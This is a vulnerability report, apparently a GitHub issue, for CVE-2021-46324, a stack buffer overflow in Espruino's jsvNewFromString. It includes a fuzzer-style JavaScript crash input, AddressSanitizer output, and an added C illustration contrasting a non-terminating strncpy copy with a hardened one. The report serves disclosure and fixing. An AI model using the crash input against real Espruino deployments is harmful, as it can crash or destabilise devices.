CVE-2021-46324: Stack-buffer-overflow src/jsvar.c:910 in jsvNewFromString · Issue #2121 · espruino/Espruino

Espruino 2v11.251 was discovered to contain a stack buffer overflow via src/jsvar.c in jsvNewFromString.


Espruino revision

Commit: 53108085
Version: 2v11.251

Build environment

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

export CCFLAGS='-g -fsanitize=address -fno-omit-frame-pointer'
make clean && make

Test case

var result = (new Array(64)."a", "b",expected,actual(new Array(64))).concat(["H"]); var value = result[0]; if (value !== void 0) throw "Error" + value;

Execution & Output

./Espruino/espruino poc.js

=================================================================
=========ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffef778ec61 at pc 0x55e21c41efe8 bp 0x7ffef778eb70 sp 0x7ffef778eb60
READ of size 1 at 0x7ffef778ec61 thread T0
    #0 0x55e21c41efe7 in jsvNewFromString src/jsvar.c:910
    #1 0x55e21c456e0c in jsvAddNamedChild src/jsvar.c:2581
    #2 0x55e21c52d165 in jspeAddNamedFunctionParameter src/jsparse.c:1442
    #3 0x55e21c5540ee in jspeExpressionOrArrowFunction src/jsparse.c:1469
    #4 0x55e21c555c06 in jspeFactor src/jsparse.c:1622
    #5 0x55e21c53891f in jspeFactorFunctionCall src/jsparse.c:1160
    #6 0x55e21c539f38 in jspePostfixExpression src/jsparse.c:1786
    #7 0x55e21c541192 in jspeBinaryExpression src/jsparse.c:1955
    #8 0x55e21c541192 in jspeConditionalExpression src/jsparse.c:1991
    #9 0x55e21c541192 in jspeAssignmentExpression src/jsparse.c:2050
    #10 0x55e21c541192 in jspeStatementVar src/jsparse.c:2165
    #11 0x55e21c54b6d4 in jspeBlockOrStatement src/jsparse.c:2124
    #12 0x55e21c54da1e in jspParse src/jsparse.c:2136
    #13 0x55e21c55c3ea in jspEvaluateVar src/jsparse.c:2996
    #14 0x55e21c55c3ea in jspEvaluate src/jsparse.c:3026
    #15 0x55e21c36c025 in main targets/linux/main.c:460
    #16 0x7fa0f5814bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
    #17 0x55e21c36fbc9 in _start (/root/Espruino/espruino+0x4ebc9)

Address 0x7ffef778ec61 is located in stack of thread T0 at offset 97 in frame
    #0 0x55e21c52cedf in jspeAddNamedFunctionParameter src/jsparse.c:1437

  This frame has 1 object(s):
    [32, 97) 'buf' <== Memory access at offset 97 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow src/jsvar.c:910 in jsvNewFromString
Shadow bytes around the buggy address:
  0x10005eee9d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10005eee9d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10005eee9d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10005eee9d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10005eee9d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x10005eee9d80: f1 f1 f1 f1 00 00 00 00 00 00 00 00[01]f2 f2 f2
  0x10005eee9d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10005eee9da0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
  0x10005eee9db0: 00 00 00 00 00 00 00 f2 00 00 00 00 00 00 00 00
  0x10005eee9dc0: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2
  0x10005eee9dd0: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
=========ABORTING
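The frame information above is the useful part of the report for triage: a 65-byte stack object 'buf' ([32, 97)) and a one-byte READ at offset 97, i.e. exactly one byte past its end, is the signature of a bounded copy that fills the buffer completely and leaves no NUL terminator, after which a string consumer walks off the end. The C below is an added illustration of that bug class beside a hardened form; it is not Espruino's code, and the strncpy primitive, the 64-byte token limit and the function names are assumptions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Assumed for illustration: a 64-byte token limit and a 65-byte stack buffer,
 * matching the 65-byte 'buf' object the ASan frame info reports. */
#define MAX_TOKEN_LEN 64
#define BUF_SIZE (MAX_TOKEN_LEN + 1)

/* Constructed sample names: 63, 64 and 65 bytes of 'a'. */
#define A8 "aaaaaaaa"
static const char NAME63[] = A8 A8 A8 A8 A8 A8 A8 "aaaaaaa";
static const char NAME64[] = A8 A8 A8 A8 A8 A8 A8 A8;
static const char NAME65[] = A8 A8 A8 A8 A8 A8 A8 A8 "a";

/* Vulnerable pattern. strncpy() writes no terminator when the source is at least
 * MAX_TOKEN_LEN bytes long, so buf[64] keeps stale stack contents and a consumer
 * that expects a C string (jsvNewFromString in the report) reads on past buf[64]:
 * the 1-byte READ at offset 97 of the [32, 97) object. To stay runnable without
 * performing that undefined read, this function does not call strlen(); it reports
 * whether any NUL landed inside the buffer, which is what the consumer relies on. */
bool unsafe_copy_is_terminated(const char *name) {
    char buf[BUF_SIZE];
    memset(buf, 'X', sizeof buf);        /* constructed: stale, non-zero stack bytes */
    strncpy(buf, name, MAX_TOKEN_LEN);   /* bounded, but not terminating */
    return memchr(buf, '\0', sizeof buf) != NULL;
}

/* Hardened pattern: measure with a bound, reject anything the buffer cannot hold
 * together with its terminator, and always write the NUL. Returns length or -1. */
int safe_copy_name(const char *name, char *out, size_t out_size) {
    size_t len = 0;
    while (len < out_size && name[len] != '\0')  /* never scans past out_size */
        len++;
    if (len >= out_size)                         /* no room for the terminator */
        return -1;
    memcpy(out, name, len);
    out[len] = '\0';
    return (int)len;
}

/* What the consumer sees after the hardened copy: -1 if rejected, else the length;
 * strlen() here is guaranteed to stop inside buf. */
int consume_name_safely(const char *name) {
    char buf[BUF_SIZE];
    if (safe_copy_name(name, buf, sizeof buf) < 0)
        return -1;
    return (int)strlen(buf);
}
```

Building the same sketch with -fsanitize=address and replacing the memchr check with strlen(buf) reproduces the class of report shown above, which is a quick way to confirm a fix before re-running the original poc.js.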
